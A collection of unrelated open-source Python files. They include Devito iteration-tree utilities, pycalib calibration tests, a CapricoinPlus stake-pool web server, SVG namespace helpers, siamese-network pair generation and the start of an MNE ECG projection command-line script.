assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_switch(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(switch='ubuntu-8')
assert app.data['charm-url'] == 'cs:ubuntu-8'
|
the-stack_0_12394 | from devito.ir.iet import Iteration, List, IterationTree, FindSections, FindSymbols
from devito.symbolics import Macro
from devito.tools import flatten
from devito.types import Array, LocalObject
__all__ = ['filter_iterations', 'retrieve_iteration_tree',
'compose_nodes', 'derive_parameters']
def retrieve_iteration_tree(node, mode='normal'):
"""Return a list of all :class:`Iteration` sub-trees rooted in ``node``.
For example, given the Iteration tree:
.. code-block:: c
Iteration i
expr0
Iteration j
Iteraion k
expr1
Iteration p
expr2
Return the list: ::
[(Iteration i, Iteration j, Iteration k), (Iteration i, Iteration p)]
:param node: The searched Iteration/Expression tree.
:param mode: Accepted values are 'normal' (default) and 'superset', in which
case iteration trees that are subset of larger iteration trees
are dropped.
"""
assert mode in ('normal', 'superset')
trees = [IterationTree(i) for i in FindSections().visit(node) if i]
if mode == 'normal':
return trees
else:
match = []
for i in trees:
if any(set(i).issubset(set(j)) for j in trees if i != j):
continue
match.append(i)
return IterationTree(match)
def filter_iterations(tree, key=lambda i: i, stop=lambda: False):
"""
Given an iterable of :class:`Iteration` objects, return a new list
containing all items such that ``key(o)`` is True.
This function accepts an optional argument ``stop``. This may be either a
lambda function, specifying a stop criterium, or any of the following
special keywords: ::
* 'any': Return as soon as ``key(o)`` is False and at least one
item has been collected.
* 'asap': Return as soon as at least one item has been collected and
all items for which ``key(o)`` is False have been encountered.
It is useful to specify a ``stop`` criterium when one is searching the
first Iteration in an Iteration/Expression tree for which a given property
does not hold.
"""
assert callable(stop) or stop in ['any', 'asap']
tree = list(tree)
filtered = []
off = []
if stop == 'any':
stop = lambda: len(filtered) > 0
elif stop == 'asap':
hits = [i for i in tree if not key(i)]
stop = lambda: len(filtered) > 0 and len(off) == len(hits)
for i in tree:
if key(i):
filtered.append(i)
else:
off.append(i)
if stop():
break
return filtered
def compose_nodes(nodes, retrieve=False):
"""
Build an Iteration/Expression tree by nesting the nodes in ``nodes``.
"""
l = list(nodes)
tree = []
if not isinstance(l[0], Iteration):
# Nothing to compose
body = flatten(l)
body = List(body=body) if len(body) > 1 else body[0]
else:
body = l.pop(-1)
while l:
handle = l.pop(-1)
body = handle._rebuild(body, **handle.args_frozen)
tree.append(body)
if retrieve is True:
tree = list(reversed(tree))
return body, tree
else:
return body
def derive_parameters(nodes, drop_locals=False):
"""
Derive all input parameters (function call arguments) from an IET
by collecting all symbols not defined in the tree itself.
"""
# Pick all free symbols and symbolic functions from the kernel
functions = FindSymbols('symbolics').visit(nodes)
free_symbols = FindSymbols('free-symbols').visit(nodes)
# Filter out function base symbols and use real function objects
function_names = [s.name for s in functions]
symbols = [s for s in free_symbols if s.name not in function_names]
symbols = functions + symbols
defines = [s.name for s in FindSymbols('defines').visit(nodes)]
parameters = tuple(s for s in symbols if s.name not in defines)
# Drop globally-visible objects
parameters = [p for p in parameters if not isinstance(p, Macro)]
# Filter out locally-allocated Arrays and Objects
if drop_locals:
parameters = [p for p in parameters
if not (isinstance(p, Array) and (p._mem_heap or p._mem_stack))]
parameters = [p for p in parameters if not isinstance(p, LocalObject)]
return parameters
|
the-stack_0_12395 | def more_even_or_odd(integers):
ans = ""
even = 0
odd = 0
for i in integers:
if i % 2 == 0:
even += 1
else:
odd += 1
if even > odd:
ans += "Even"
elif even < odd:
ans += "Odd"
else:
ans += "Equal"
return ans |
the-stack_0_12396 | # Standard imports
import pytest
import numpy as np
# Package imports
import pycalib.calibration_methods as calm
# General
@pytest.fixture(scope='module')
def sample_size():
return 1000
@pytest.fixture(scope='module')
def p_dist_beta(sample_size, a=1, b=4):
# Predicted probabilities (transformed to [0.5, 1])
return np.hstack([np.random.beta(a=a, b=b, size=sample_size)]) * 0.5 + 0.5
@pytest.fixture(scope='module')
def y_cal_binary(sample_size, prob_class_0=.66):
# Sample ground truth
return np.random.choice(a=[0, 1], size=sample_size, replace=True, p=[prob_class_0, 1 - prob_class_0])
@pytest.fixture(scope='module')
def p_cal_binary(sample_size, y_cal_binary, p_dist_beta, a=3, b=.1, c=1):
# Uncalibrated probabilities through miscalibration function f
# f = lambda x: 1 / (1 + c * (1 - x) ** a / x ** b)
f = lambda x: 1 / (1 + np.exp(-a * x - b))
sampler_f = lambda w, y: np.random.choice(a=[1 - y, y], p=[1 - f(w), f(w)])
y_pred = np.array(list(map(sampler_f, p_dist_beta, y_cal_binary)))
# Compute probabilities for other classes
p_pred = np.zeros([sample_size, 2])
for i in range(0, 2):
# Set probabilities for correct predictions
correct_and_index_i = (y_pred == y_cal_binary) & (y_cal_binary == i)
prob = p_dist_beta[correct_and_index_i]
p_pred[correct_and_index_i, i] = prob
p_pred[correct_and_index_i, 1 - i] = 1 - prob
# Set probabilities for incorrect predictions
false_and_index_i = (y_pred != y_cal_binary) & (y_cal_binary == i)
prob = p_dist_beta[false_and_index_i]
p_pred[false_and_index_i, i] = 1 - prob
p_pred[false_and_index_i, 1 - i] = prob
return p_pred
# Temperature Scaling
def test_constant_accuracy(p_cal_binary, y_cal_binary):
# Compute accuracy
acc = np.mean(np.equal(np.argmax(p_cal_binary, axis=1), y_cal_binary))
# Temperature Scaling
ts = calm.TemperatureScaling()
ts.fit(p_cal_binary, y_cal_binary)
# Test constant accuracy on calibration set
p_ts = ts.predict_proba(p_cal_binary)
acc_ts = np.mean(np.equal(np.argmax(p_ts, axis=1), y_cal_binary))
assert acc == acc_ts, "Accuracy of calibrated probabilities does not match accuracy of calibration set."
def test_temperature_positive(p_cal_binary, y_cal_binary):
# Temperature Scaling
ts = calm.TemperatureScaling()
ts.fit(p_cal_binary, y_cal_binary)
# Positive temperature
assert ts.T > 0, "Temperature is not positive."
# Histogram Binning
@pytest.mark.parametrize("binning_mode", [
("equal_width"),
("equal_freq")
])
def test_hist_binning_bin_size(p_cal_binary, y_cal_binary, binning_mode):
n_bins = 2
hb = calm.HistogramBinning(mode=binning_mode, n_bins=n_bins)
hb.fit(p_cal_binary, y_cal_binary)
assert len(hb.binning) == n_bins + 1, "Number of bins does not match input."
# Bayesian Binning into Quantiles
def test_bin_with_size_zero():
# Data
p_cal = .5 * np.ones([100, 2])
y_cal = np.hstack([np.ones([50]), np.zeros([50])])
# Fit calibration model
bbq = calm.BayesianBinningQuantiles()
bbq.fit(X=p_cal, y=y_cal)
# Predict
p_pred = bbq.predict_proba(X=p_cal)
# Check for NaNs
assert not np.any(np.isnan(p_pred)), "Calibrated probabilities are NaN."
# GP calibration
def test_inference_mean_approximation(p_cal_binary, y_cal_binary):
# GP calibration
gpc = calm.GPCalibration(n_classes=2, logits=False, random_state=42)
gpc.fit(p_cal_binary, y_cal_binary)
# Inference: mean approximation
p_gpc = gpc.predict_proba(p_cal_binary, mean_approx=True)
# Check for NaNs in predictions
assert not np.any(np.isnan(p_gpc)), "Calibrated probabilities of the mean approximation are NaN."
# OneVsAll calibration
def test_output_size_missing_classes():
# Generate random training data with n_classes > n_calibration
np.random.seed(1)
n_classes = 200
n_calibration = 100
X_cal = np.random.uniform(0, 1, [n_calibration, n_classes])
X_cal /= np.sum(X_cal, axis=1)[:, np.newaxis]
y_cal = np.random.choice(range(n_classes), n_calibration)
# Arbitrary Choice of binary calibration method
platt = calm.PlattScaling()
platt.fit(X_cal, y_cal)
# Test output size
assert np.shape(platt.predict_proba(X_cal))[
1] == n_classes, "Predicted probabilities do not match number of classes."
|
the-stack_0_12397 | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2019 The Particl Core developers
# Copyright (c) 2020 The Capricoin+ Core developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE.txt or http://www.opensource.org/licenses/mit-license.php.
import os
import json
import hashlib
import threading
import decimal
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer
from .util import (
COIN,
makeInt,
format8,
format16,
)
class HttpHandler(BaseHTTPRequestHandler):
def page_error(self, error_str):
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Error</title></head>' \
+ '<body>' \
+ '<p>Error: ' + error_str + '</p>' \
+ '<p><a href=\'/\'>home</a></p>' \
+ '</body></html>'
return bytes(content, 'UTF-8')
def js_error(self, error_str):
error_str_json = json.dumps({'error': error_str})
return bytes(error_str_json, 'UTF-8')
def js_address(self, urlSplit):
if len(urlSplit) < 4:
raise ValueError('Must specify address')
address_str = urlSplit[3]
stakePool = self.server.stakePool
return bytes(json.dumps(stakePool.getAddressSummary(address_str)), 'UTF-8')
def js_metrics(self, urlSplit):
stakePool = self.server.stakePool
if len(urlSplit) > 3:
code_str = urlSplit[3]
hashed = hashlib.sha256(str(code_str + self.server.management_key_salt).encode('utf-8')).hexdigest()
if not hashed == self.server.management_key_hash:
raise ValueError('Unknown argument')
return bytes(json.dumps(stakePool.rebuildMetrics()), 'UTF-8')
return bytes(json.dumps(stakePool.getMetrics()), 'UTF-8')
def js_index(self, urlSplit):
return bytes(json.dumps(self.server.stakePool.getSummary()), 'UTF-8')
def page_config(self, urlSplit):
settings_path = os.path.join(self.server.stakePool.dataDir, 'stakepool.json')
if not os.path.exists(settings_path):
return self.page_error('Settings file not found.')
with open(settings_path) as fs:
settings = json.load(fs)
settings['capricoinplusbindir'] = '...'
settings['capricoinplusdatadir'] = '...'
settings['poolownerwithdrawal'] = '...'
settings.pop('management_key_salt', None)
settings.pop('management_key_hash', None)
return bytes(json.dumps(settings, indent=4), 'UTF-8')
def page_address(self, urlSplit):
if len(urlSplit) < 3:
return self.page_error('Must specify address')
address_str = urlSplit[2]
stakePool = self.server.stakePool
try:
summary = stakePool.getAddressSummary(address_str)
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Address </title></head>' \
+ '<body>' \
+ '<h2>Spend Address ' + address_str + '</h2>' \
+ '<h4>Pool Address ' + stakePool.poolAddr + '</h4>'
if 'accumulated' in summary:
content += '<table>' \
+ '<tr><td>Accumulated:</td><td>' + format16(summary['accumulated']) + '</td></tr>' \
+ '<tr><td>Payout Pending:</td><td>' + format8(summary['rewardpending']) + '</td></tr>' \
+ '<tr><td>Paid Out:</td><td>' + format8(summary['rewardpaidout']) + '</td></tr>' \
+ '<tr><td>Last Total Staking:</td><td>' + format8(summary['laststaking']) + '</td></tr>' \
+ '<tr><td>Current Total in Pool:</td><td>' + format8(summary['currenttotal']) + '</td></tr>' \
+ '</table>'
else:
content += '<table>' \
+ '<tr><td>Current Total in Pool:</td><td>' + format8(summary['currenttotal']) + '</td></tr>' \
+ '</table>'
content += '<p><a href=\'/\'>home</a></p></body></html>'
return bytes(content, 'UTF-8')
def page_version(self):
try:
versions = self.server.stakePool.getVersions()
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<p>' \
+ 'Pool Version: ' + versions['pool'] + '<br/>' \
+ 'Core Version: ' + versions['core'] + '<br/>' \
+ '</p>' \
+ '<p><a href=\'/\'>home</a></p></body></html>'
return bytes(content, 'UTF-8')
def page_index(self):
stakePool = self.server.stakePool
try:
summary = stakePool.getSummary()
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<p>' \
+ 'Mode: ' + summary['poolmode'] + '<br/>' \
+ 'Pool Address: ' + stakePool.poolAddr + '<br/>' \
+ 'Pool Fee: ' + str(stakePool.poolFeePercent) + '%<br/>' \
+ 'Stake Bonus: ' + str(stakePool.stakeBonusPercent) + '%<br/>' \
+ 'Payout Threshold: ' + format8(stakePool.payoutThreshold) + '<br/>' \
+ 'Blocks Between Payment Runs: ' + str(stakePool.minBlocksBetweenPayments) + '<br/>' \
+ 'Minimum output value: ' + format8(stakePool.minOutputValue) + '<br/>'
if stakePool.smsg_fee_rate_target is not None:
content += 'SMSG fee rate target: ' + format8(makeInt(stakePool.smsg_fee_rate_target)) + '<br/>'
content += '</p><p>' \
+ 'Synced Height: ' + str(summary['poolheight']) + '<br/>' \
+ 'Blocks Found: ' + str(summary['blocksfound']) + '<br/>' \
+ 'Total Disbursed: ' + format8(summary['totaldisbursed']) + '<br/>' \
+ 'Last Payment Run: ' + str(summary['lastpaymentrunheight']) + '<br/>' \
+ '<br/>' \
+ 'Total Pool Rewards: ' + format8(summary['poolrewardtotal']) + '<br/>' \
+ 'Total Pool Fees: ' + format8(summary['poolfeestotal']) + '<br/>' \
+ 'Total Pool Rewards Withdrawn: ' + format8(summary['poolwithdrawntotal']) + '<br/>' \
+ '<br/>' \
+ 'Total Pooled Coin: ' + format8(int(decimal.Decimal(summary['watchonlytotalbalance']) * COIN)) + '<br/>' \
+ 'Currently Staking: ' + format8(summary['stakeweight']) + '<br/>' \
+ '</p>'
content += '<br/><h3>Recent Blocks</h3><table><tr><th>Height</th><th>Block Hash</th><th>Block Reward</th><th>Total Coin Staking</th></tr>'
for b in summary['lastblocks']:
content += '<tr><td>' + str(b[0]) + '</td><td>' + b[1] + '</td><td>' + format8(b[2]) + '</td><td>' + format8(b[3]) + '</td></tr>'
content += '</table>'
content += '<br/><h3>Pending Payments</h3><table><tr><th>Txid</th><th>Disbursed</th></tr>'
for b in summary['pendingpayments']:
content += '<tr><td>' + b[0] + '</td><td>' + format8(b[1]) + '</td></tr>'
content += '</table>'
content += '<br/><h3>Last Payments</h3><table><tr><th>Height</th><th>Txid</th><th>Disbursed</th></tr>'
for b in summary['lastpayments']:
content += '<tr><td>' + str(b[0]) + '</td><td>' + b[1] + '</td><td>' + format8(b[2]) + '</td></tr>'
content += '</table>'
content += '</body></html>'
return bytes(content, 'UTF-8')
"""
def page_help(self):
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<h3>Help</h3>' \
+ '<p>' \
+ '</p></body></html>'
return bytes(content, 'UTF-8')
"""
def putHeaders(self, status_code, content_type):
self.send_response(status_code)
if self.server.allow_cors:
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', content_type)
self.end_headers()
def handle_http(self, status_code, path):
urlSplit = self.path.split('/')
if len(urlSplit) > 1:
if urlSplit[1] == 'address':
self.putHeaders(status_code, 'text/html')
return self.page_address(urlSplit)
if urlSplit[1] == 'version':
self.putHeaders(status_code, 'text/html')
return self.page_version()
if urlSplit[1] == 'config':
self.putHeaders(status_code, 'text/plain')
return self.page_config(urlSplit)
if urlSplit[1] == 'json':
self.putHeaders(status_code, 'text/plain')
try:
if len(urlSplit) > 2:
if urlSplit[2] == 'version':
return bytes(json.dumps(self.server.stakePool.getVersions()), 'UTF-8')
if urlSplit[2] == 'address':
return self.js_address(urlSplit)
if urlSplit[2] == 'metrics':
return self.js_metrics(urlSplit)
return self.js_index(urlSplit)
except Exception as e:
return self.js_error(str(e))
self.putHeaders(status_code, 'text/html')
return self.page_index()
def do_GET(self):
response = self.handle_http(200, self.path)
self.wfile.write(response)
def do_HEAD(self):
self.putHeaders(200, 'text/html')
def do_OPTIONS(self):
self.send_response(200, 'ok')
if self.server.allow_cors:
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Headers', '*')
self.end_headers()
class HttpThread(threading.Thread, HTTPServer):
def __init__(self, fp, hostName, portNo, allow_cors, stakePool, key_salt=None, key_hash=None):
threading.Thread.__init__(self)
self.stop_event = threading.Event()
self.fp = fp
self.hostName = hostName
self.portNo = portNo
self.allow_cors = allow_cors
self.stakePool = stakePool
self.management_key_salt = 'ajf8923ol2xcv.' if key_salt is None else key_salt
self.management_key_hash = 'fd5816650227b75143e60c61b19e113f43f5dcb57e2aa5b6161a50973f2033df' if key_hash is None else key_hash
self.timeout = 60
HTTPServer.__init__(self, (self.hostName, self.portNo), HttpHandler)
def stop(self):
self.stop_event.set()
# Send fake request
conn = http.client.HTTPConnection(self.hostName, self.portNo)
conn.connect()
conn.request("GET", "/none")
response = conn.getresponse()
data = response.read()
conn.close()
def stopped(self):
return self.stop_event.is_set()
def serve_forever(self):
while not self.stopped():
self.handle_request()
self.socket.close()
def run(self):
self.serve_forever()
|
the-stack_0_12398 | from xml.etree.ElementTree import register_namespace
namespaces = {
'': 'http://www.w3.org/2000/svg',
'inkscape': 'http://www.inkscape.org/namespaces/inkscape',
'sodipodi': 'http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd',
'svg': 'http://www.w3.org/2000/svg',
'freecad': 'http://www.freecadweb.org/wiki/index.php?title=Svg_Namespace',
'xml': 'http://www.w3.org/XML/1998/namespace'
}
def namespaced(name, namespace_prefix=''):
return f'{{{namespaces[namespace_prefix]}}}{name}'
def namespaced_attrib(name, namespace_prefix=''):
if namespace_prefix == '':
return name
return namespaced(name, namespace_prefix)
def register_namespaces():
for prefix, url in namespaces.items():
register_namespace(prefix, url) |
the-stack_0_12402 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains functions used for creating pairs from labeled and unlabeled data (currently used only for the siamese network)."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import random
import numpy as np
from sklearn import metrics
from sklearn.neighbors import NearestNeighbors
def get_choices(arr, num_choices, valid_range, not_arr=None, replace=False):
"""Select n=num_choices choices from arr, with the following constraints.
Args:
arr: if arr is an integer, the pool of choices is interpreted as [0, arr]
num_choices: number of choices
valid_range: choice > valid_range[0] and choice < valid_range[1]
not_arr: choice not in not_arr
replace: if True, draw choices with replacement
Returns:
choices.
"""
if not_arr is None:
not_arr = []
if isinstance(valid_range, int):
valid_range = [0, valid_range]
# make sure we have enough valid points in arr
if isinstance(arr, tuple):
if min(arr[1], valid_range[1]) - max(arr[0], valid_range[0]) < num_choices:
raise ValueError('Not enough elements in arr are outside of valid_range!')
n_arr = arr[1]
arr0 = arr[0]
arr = collections.defaultdict(lambda: -1)
get_arr = lambda x: x
replace = True
else:
greater_than = np.array(arr) > valid_range[0]
less_than = np.array(arr) < valid_range[1]
if np.sum(np.logical_and(greater_than, less_than)) < num_choices:
raise ValueError('Not enough elements in arr are outside of valid_range!')
# make a copy of arr, since we'll be editing the array
n_arr = len(arr)
arr0 = 0
arr = np.array(arr, copy=True)
get_arr = lambda x: arr[x]
not_arr_set = set(not_arr)
def get_choice():
arr_idx = random.randint(arr0, n_arr - 1)
while get_arr(arr_idx) in not_arr_set:
arr_idx = random.randint(arr0, n_arr - 1)
return arr_idx
if isinstance(not_arr, int):
not_arr = list(not_arr)
choices = []
for _ in range(num_choices):
arr_idx = get_choice()
while get_arr(arr_idx) <= valid_range[0] or get_arr(
arr_idx) >= valid_range[1]:
arr_idx = get_choice()
choices.append(int(get_arr(arr_idx)))
if not replace:
arr[arr_idx], arr[n_arr - 1] = arr[n_arr - 1], arr[arr_idx]
n_arr -= 1
return choices
def create_pairs_from_labeled_data(x, digit_indices, use_classes=None):
"""Positive and negative pair creation from labeled data.
Alternates between positive and negative pairs.
Args:
x: labeled data
digit_indices: nested array of depth 2 (in other words a jagged matrix),
where row i contains the indices in x of all examples labeled with class i
use_classes: in cases where we only want pairs from a subset of the
classes, use_classes is a list of the classes to draw pairs from, else it
is None
Returns:
pairs: positive and negative pairs
labels: corresponding labels
"""
n_clusters = len(digit_indices)
if use_classes is None:
use_classes = list(range(n_clusters))
pairs = []
labels = []
n = min([len(digit_indices[d]) for d in range(n_clusters)]) - 1
for d in use_classes:
for i in range(n):
z1, z2 = digit_indices[d][i], digit_indices[d][i + 1]
pairs += [[x[z1], x[z2]]]
inc = random.randrange(1, n_clusters)
dn = (d + inc) % n_clusters
z1, z2 = digit_indices[d][i], digit_indices[dn][i]
pairs += [[x[z1], x[z2]]]
labels += [1, 0]
pairs = np.array(pairs).reshape((len(pairs), 2) + x.shape[1:])
labels = np.array(labels)
return pairs, labels
def create_pairs_from_unlabeled_data(x1,
x2=None,
y=None,
p=None,
k=5,
tot_pairs=None,
pre_shuffled=False,
verbose=None):
"""Generates positive and negative pairs for the siamese network from unlabeled data.
Draws from the k nearest neighbors (where k is the
provided parameter) of each point to form pairs. Number of neighbors
to draw is determined by tot_pairs, if provided, or k if not provided.
Args:
x1: input data array
x2: parallel data array (pairs will exactly shadow the indices of x1, but be
drawn from x2)
y: true labels (if available) purely for checking how good our pairs are
p: permutation vector - in cases where the array is shuffled and we use a
precomputed knn matrix (where knn is performed on unshuffled data), we
keep track of the permutations with p, and apply the same permutation to
the precomputed knn matrix
k: the number of neighbors to use (the 'k' in knn)
tot_pairs: total number of pairs to produce words, an approximation of KNN
pre_shuffled: pre shuffled or not
verbose: flag for extra debugging printouts
Returns:
pairs for x1, (pairs for x2 if x2 is provided), labels
(inferred by knn), (labels_true, the absolute truth, if y
is provided
"""
if x2 is not None and x1.shape != x2.shape:
raise ValueError('x1 and x2 must be the same shape!')
n = len(p) if p is not None else len(x1)
pairs_per_pt = max(1, min(k, int(
tot_pairs / (n * 2)))) if tot_pairs is not None else max(1, k)
if p is not None and not pre_shuffled:
x1 = x1[p[:n]]
y = y[p[:n]]
pairs = []
pairs2 = []
labels = []
true = []
verbose = True
if verbose:
print('computing k={} nearest neighbors...'.format(k))
if len(x1.shape) > 2:
x1_flat = x1.reshape(x1.shape[0], np.prod(x1.shape[1:]))[:n]
else:
x1_flat = x1[:n]
print('I am hereee', x1_flat.shape)
nbrs = NearestNeighbors(n_neighbors=k + 1).fit(x1_flat)
print('NearestNeighbors')
_, idx = nbrs.kneighbors(x1_flat)
print('NearestNeighbors2')
# for each row, remove the element itself from its list of neighbors
# (we don't care that each point is its own closest neighbor)
new_idx = np.empty((idx.shape[0], idx.shape[1] - 1))
print('replace')
assert (idx >= 0).all()
print('I am hereee', idx.shape[0])
for i in range(idx.shape[0]):
try:
new_idx[i] = idx[i, idx[i] != i][:idx.shape[1] - 1]
except Exception as e:
print(idx[i, Ellipsis], new_idx.shape, idx.shape)
raise e
idx = new_idx.astype(np.int)
k_max = min(idx.shape[1], k + 1)
if verbose:
print('creating pairs...')
print('ks', n, k_max, k, pairs_per_pt)
# pair generation loop (alternates between true and false pairs)
consecutive_fails = 0
for i in range(n):
# get_choices sometimes fails with precomputed results. if this happens
# too often, we relax the constraint on k
if consecutive_fails > 5:
k_max = min(idx.shape[1], int(k_max * 2))
consecutive_fails = 0
if verbose and i % 10000 == 0:
print('Iter: {}/{}'.format(i, n))
# pick points from neighbors of i for positive pairs
try:
choices = get_choices(
idx[i, :k_max], pairs_per_pt, valid_range=[-1, np.inf], replace=False)
consecutive_fails = 0
except ValueError:
consecutive_fails += 1
continue
assert i not in choices
# form the pairs
new_pos = [[x1[i], x1[c]] for c in choices]
if x2 is not None:
new_pos2 = [[x2[i], x2[c]] for c in choices]
if y is not None:
pos_labels = [[y[i] == y[c]] for c in choices]
# pick points *not* in neighbors of i for negative pairs
try:
choices = get_choices((0, n),
pairs_per_pt,
valid_range=[-1, np.inf],
not_arr=idx[i, :k_max],
replace=False)
consecutive_fails = 0
except ValueError:
consecutive_fails += 1
continue
# form negative pairs
new_neg = [[x1[i], x1[c]] for c in choices]
if x2 is not None:
new_neg2 = [[x2[i], x2[c]] for c in choices]
if y is not None:
neg_labels = [[y[i] == y[c]] for c in choices]
# add pairs to our list
labels += [1] * len(new_pos) + [0] * len(new_neg)
pairs += new_pos + new_neg
if x2 is not None:
pairs2 += new_pos2 + new_neg2
if y is not None:
true += pos_labels + neg_labels
# package return parameters for output
ret = [np.array(pairs).reshape((len(pairs), 2) + x1.shape[1:])]
if x2 is not None:
ret.append(np.array(pairs2).reshape((len(pairs2), 2) + x2.shape[1:]))
ret.append(np.array(labels))
if y is not None:
true = np.array(true).astype(np.int).reshape(-1, 1)
if verbose:
# if true vectors are provided, we can take a peek to check
# the validity of our kNN approximation
print('confusion matrix for pairs and approximated labels:')
print(metrics.confusion_matrix(true, labels) / true.shape[0])
print(metrics.confusion_matrix(true, labels))
ret.append(true)
return ret
|
the-stack_0_12403 | #!/usr/bin/env python
r"""Compute SSP/PCA projections for ECG artifacts.
Examples
--------
.. code-block:: console
$ mne compute_proj_ecg -i sample_audvis_raw.fif -c "MEG 1531" \
--l-freq 1 --h-freq 100 \
--rej-grad 3000 --rej-mag 4000 --rej-eeg 100
"""
# Authors : Alexandre Gramfort, Ph.D.
# Martin Luessi, Ph.D.
import os
import sys
import mne
def run():
"""Run command."""
from mne.commands.utils import get_optparser
parser = get_optparser(__file__)
parser.add_option("-i", "--in", dest="raw_in",
help="Input raw FIF file", metavar="FILE")
parser.add_option("--tmin", dest="tmin", type="float",
help="Time before event in seconds",
default=-0.2)
parser.add_option("--tmax", dest="tmax", type="float",
help="Time after event in seconds",
default=0.4)
parser.add_option("-g", "--n-grad", dest="n_grad", type="int",
help="Number of SSP vectors for gradiometers",
default=2)
parser.add_option("-m", "--n-mag", dest="n_mag", type="int",
help="Number of SSP vectors for magnetometers",
default=2)
parser.add_option("-e", "--n-eeg", dest="n_eeg", type="int",
help="Number of SSP vectors for EEG",
default=2)
parser.add_option("--l-freq", dest="l_freq", type="float",
help="Filter low cut-off frequency in Hz",
default=1)
parser.add_option("--h-freq", dest="h_freq", type="float",
help="Filter high cut-off frequency in Hz",
default=100)
parser.add_option("--ecg-l-freq", dest="ecg_l_freq", type="float",
help="Filter low cut-off frequency in Hz used "
"for ECG event detection",
default=5)
parser.add_option("--ecg-h-freq", dest="ecg_h_freq", type="float",
help="Filter high cut-off frequency in Hz used "
"for ECG event detection",
default=35)
parser.add_option("-p", "--preload", dest="preload",
help="Temporary file used during computation "
"(to save memory)",
default=True)
parser.add_option("-a", "--average", dest="average", action="store_true",
help="Compute SSP after averaging",
default=False) # XXX: change to default=True in 0.17
parser.add_option("--proj", dest="proj",
help="Use SSP projections from a fif file.",
default=None)
parser.add_option("--filtersize", dest="filter_length", type="int",
help="Number of taps to use for filtering",
default=2048)
parser.add_option("-j", "--n-jobs", dest="n_jobs", type="int",
help="Number of jobs to run in parallel",
default=1)
parser.add_option("-c", "--channel", dest="ch_name",
help="Channel to use for ECG detection "
"(Required if no ECG found)",
default=None)
parser.add_option("--rej-grad", dest="rej_grad", type="float",
help="Gradiometers rejection parameter "
"in fT/cm (peak to peak amplitude)",
default=2000)
parser.add_option("--rej-mag", dest="rej_mag", type="float",
help="Magnetometers rejection parameter "
"in fT (peak to peak amplitude)",
default=3000)
parser.add_option("--rej-eeg", dest="rej_eeg", type="float",
help="EEG rejection parameter in uV "
"(peak to peak amplitude)",
default=50)
parser.add_option("--rej-eog", dest="rej_eog", type="float",
help="EOG rejection parameter in uV "
"(peak to peak amplitude)",
default=250)
parser.add_option("--avg-ref", dest="avg_ref", action="store_true",
help="Add EEG average reference proj",
default=False)
parser.add_option("--no-proj", dest="no_proj", action="store_true",
help="Exclude the SSP projectors currently "
"in the fiff file",
default=False)
parser.add_option("--bad", dest="bad_fname",
help="Text file containing bad channels list "
"(one per line)",
default=None)
parser.add_option("--event-id", dest="event_id", type="int",
help="ID to use for events",
default=999)
parser.add_option("--event-raw", dest="raw_event_fname",
help="raw file to use for event detection",
default=None)
parser.add_option("--tstart", dest="tstart", type="float",
help="Start artifact detection after tstart seconds",
default=0.)
parser.add_option("--qrsthr", dest="qrs_threshold", type="string",
help="QRS detection threshold. Between 0 and 1. Can "
"also be 'auto' for automatic selection",
default='auto')
options, args = parser.parse_args()
raw_in = options.raw_in
if raw_in is None:
parser.print_help()
sys.exit(1)
tmin = options.tmin
tmax = options.tmax
n_grad = options.n_grad
n_mag = options.n_mag
n_eeg = options.n_eeg
l_freq = options.l_freq
h_freq = options.h_freq
ecg_l_freq = options.ecg_l_freq
ecg_h_freq = options.ecg_h_freq
average = options.average
preload = options.preload
filter_length = options.filter_length
n_jobs = options.n_jobs
ch_name = options.ch_name
reject = dict(grad=1e-13 * float(options.rej_grad),
mag=1e-15 * float(options.rej_mag),
eeg=1e-6 * float(options.rej_eeg),
eog=1e-6 * float(options.rej_eog))
avg_ref = options.avg_ref
no_proj = options.no_proj
bad_fname = options.bad_fname
event_id = options.event_id
proj_fname = options.proj
raw_event_fname = options.raw_event_fname
tstart = options.tstart
qrs_threshold = options.qrs_threshold
if qrs_threshold != 'auto':
try:
qrs_threshold = float(qrs_threshold)
except ValueError:
raise ValueError('qrsthr must be "auto" or a float')
if bad_fname is not None:
with open(bad_fname, 'r') as fid:
bads = [w.rstrip() for w in fid.readlines()]
print('Bad channels read : %s' % bads)
else:
bads = []
if raw_in.endswith('_raw.fif') or raw_in.endswith('-raw.fif'):
prefix = raw_in[:-8]
else:
prefix = raw_in[:-4]
ecg_event_fname = prefix + '_ecg-eve.fif'
if average:
